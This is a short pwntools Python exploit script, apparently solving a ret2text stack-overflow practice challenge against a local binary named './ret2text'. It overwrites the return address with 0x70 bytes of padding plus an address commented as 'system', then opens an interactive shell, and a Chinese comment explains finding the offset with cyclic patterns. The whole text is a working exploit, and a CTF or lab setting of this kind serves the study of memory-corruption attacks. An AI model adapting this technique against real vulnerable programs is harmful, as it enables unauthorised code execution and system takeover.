#!/usr/bin/env python
from pwn import *

sh = process('./ret2text')
target = 0x804863a					# system
payload = b'A'*0x70 + p32(target)	# 手动输入发现溢出地址在0x70处，使用 cyclic 200 生成数据。
									# cyclic -l 0x62616164 
sh.sendline(payload)
sh.interactive()
